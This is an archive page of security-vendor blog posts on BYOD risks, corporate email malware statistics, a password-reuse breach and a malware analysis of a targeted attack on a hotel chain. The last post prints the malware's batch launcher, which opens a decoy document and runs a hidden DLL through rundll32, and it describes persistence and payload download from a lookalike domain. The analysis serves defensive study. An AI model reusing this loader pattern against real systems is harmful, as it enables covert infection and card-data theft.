Tag Archives: Adaptive Defense 360

BYOD: when protecting the perimeter is not enough

It’s a well-known fact that millennials and generation Z are digital natives and are basically always connected to their gadgets.  This trend has consequences extending beyond the consumer market, with an effect on the corporate world as this young cohort enters the workforce.  One example is more people using their own laptops and mobile phones at the office and for work in general. The consultancy firm Markets & Markets estimates the Bring Your Own Device (BYOD) market will be worth $73.3 billion in 2021.

BYOD has several advantages for companies. IT managers note that employee productivity is on the rise and workers have more flexibility, resulting in better customer service. That said, it also presents various challenges for security that go beyond a company’s physical perimeter. What risks does BYOD entail? What is the best way of dealing with them?

The perimeter includes wherever an employee is located

Companies are exposed to a high number of threats coming from all sides, from dangerous web content to malware that can affect the entire corporate network. Attacks are increasing in frequency, resulting in more attention being paid to cybersecurity. That’s why the firm Cybersecurity Ventures estimates that the total spend on cybersecurity will hit one trillion dollars in the next five years.

However, many of these investments in cybersecurity only protect devices and servers on the corporate network. With BYOD, it’s clear that only protecting the physical perimeter is insufficient. The trend has resulted in personal mobile devices such as smartphones, tablets, and laptops, which are not under direct control of IT managers, being able to access the corporate network from anywhere. This means that the perimeter extends to anywhere employees are located, no matter how far they may be from the office. Thus, it is necessary that protection covers all devices.

The need for a BYOD policy

To prevent security risks and before applying solutions, it is essential for companies, regardless of their size, to establish a BYOD policy with a clear blueprint and adapt it to all platforms so that they are properly prepared. Accordingly, consultant Larry Alton recommends that a BYOD strategy include specific guidelines.  Once the criteria for program use are established, IT managers should allow employees to add their personal devices to the network.

However, it does not mean that IT has strict control over employees’ devices. The ideal situation is to strike a balance between keeping a company’s data secure and safeguarding the privacy of employees, who will of course continue using their devices for personal use. Thus excessively strict or invasive policies are counterproductive. Policies should be completely transparent to determine each party’s responsibility.

Monitoring solutions until the endpoint

Given the nature of the security risks of BYOD, organizations should implement solutions that apply a constant real-time monitoring of the corporate network and of all its access points. Generally, security solutions only address servers and work stations within the physical space of the company but, as we mentioned before, with BYOD, simply protecting the physical perimeter is not enough.  Therefore, protection should extend to all endpoints and devices.

One example of this type of solution is Panda Adaptive Defense, an endpoint detection and response service capable of accurately classifying any application and blocking advanced threats as well as zero-day and directed attacks that other more traditional solutions are incapable of detecting.

Although BYOD presents new security risks, the opportunities it offers companies and employees far outweigh these risks if the necessary precautions are taken. A prevention strategy based on appropriate policies and on real-time monitoring solutions for all devices is the best way to take advantage of BYOD’s full potential.

The post BYOD: when protecting the perimeter is not enough appeared first on Panda Security Mediacenter.

Read More

Corporate email addresses receive four times more malware than personal ones


Cyber-attacks cost companies millions of euros each year. A high price to pay which, according to a study conducted by Google’s Research Team, is not only due to the growing sophistication of the strategies and tools used by cyber-crooks, but also to the huge number of threats in circulation.

Researchers examined over 1 billion email exchanges via Gmail to analyze the diversity and prevalence of the attacks perpetrated via email in corporate environments.

The report concludes that while spam campaigns continue to be the most common type of attack on both personal and corporate accounts, malware and phishing campaigns are primarily aimed at companies and their employees.

After comparing the figures for corporate and consumer inboxes, researchers found that companies are four times more likely to receive malware than home users. And, regarding malware types, ransomware continues to be the attackers’ weapon of choice. Additionally, corporate email addresses are approximately six times more likely to receive phishing emails than personal accounts.

This is due to the fact that corporations tend to store more valuable information, which can be much more easily monetized on the Dark Web.

Most affected countries and industries

In addition to this global research, Google’s experts also looked at the industries and types of organizations most affected by cyber-attacks. “Attackers appear to choose targets based on multiple dimensions, such as the size and the type of the organization, its country of operation, and the organization’s sector of activity,” conclude Google’s researchers.

In this context, the data obtained reveals that while cyber-crooks aim malware attacks at nonprofits and educational organizations primarily, businesses are the most common target of phishing and spam attacks.  More precisely, spam campaigns mostly target companies in the entertainment and IT sectors. These, together with real-estate companies, were the organizations most hit by cyber-attacks in the first months of 2017.

According to the report, “The largest spammers in the world target other countries.” In this respect, the list of most affected countries is topped by the United States, Germany and France, with Spain in seventh place.

Furthermore, financial organizations such as banks, consulting firms or insurance companies are the preferred target of phishing campaigns. Far from decreasing in number, experts believe that cyber-attacks will continue to grow in the future. That’s why it is advisable to implement measures such as two-step authentication and cyber-security solutions that combine context intelligence and defense operations to anticipate and stop malicious behaviors and data leaks.


The post Corporate email addresses receive four times more malware than personal ones appeared first on Panda Security Mediacenter.

Read More

Even the inventor of the World Wide Web can be hacked. What about us?

contraseñas_FOTO2Even the inventor of the World Wide Web, Mr. Tim Berners-Lee, can have his password stolen. The hackers were able to access IT resources belonging to the organization that governs the Web (W3C). This makes us wonder: Is there a company that isn’t vulnerable to this type of attack?


We all face the same problem: We are only as strong as our weakest link. Stealing the password belonging to a single employee, especially if their access level is high (for example, a manager), is sufficient means for a cyber-criminal to sneak into a company’s entire system.


According to a recent report by the Cloud Security Alliance (CSA), nearly a quarter (22%) of the IT breaches in companies began with a single password leak. In addition, 65 per cent of the study’s participants believe that there is a medium to high chance that there will be future risks caused by a compromised password.


A fourth of IT breaches began with a single password leak



Pictured: Tim Berners-Lee, the inventor of the World Wide Web

Like many others, Tim Berners-Lee’s situation could have been easily avoided. If an attacker gained access to the back door of the W3C it was because Berners-Lee repeated passwords. It is possible that he used the same password as the one he used for the IRC chats he used to communicate with his team.


The intruder initially got into the system using Berners-Lee’s information, then the same password opened other access points without problem. It was even possible to sneak into the web’s editing area, retouch the founder’s profile, and leave an encryption seal to prove that the cyber-criminal had been there.


To avoid being in this situation, there’s a simple and effective measure that should be followed by everyone in your company: use a different password for every service. That way, if one of your passwords is stolen, cyber-criminals will not have access to other resources belonging to your company.

Likewise, it’s also important to have a dependable security solution for your business to fall back on, like Panda Adaptive Defense 360, which is able to combat the theft of corporate information against both external and internal threats.

The post Even the inventor of the World Wide Web can be hacked. What about us? appeared first on Panda Security Mediacenter.

Read More

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

advanced attacks hotels

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file is shown below:

@echo off

start “” ROCA.ING.docx

Set xOS=x64


IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)

IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

Contact with a specific URL:


Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file


When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:


As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Read More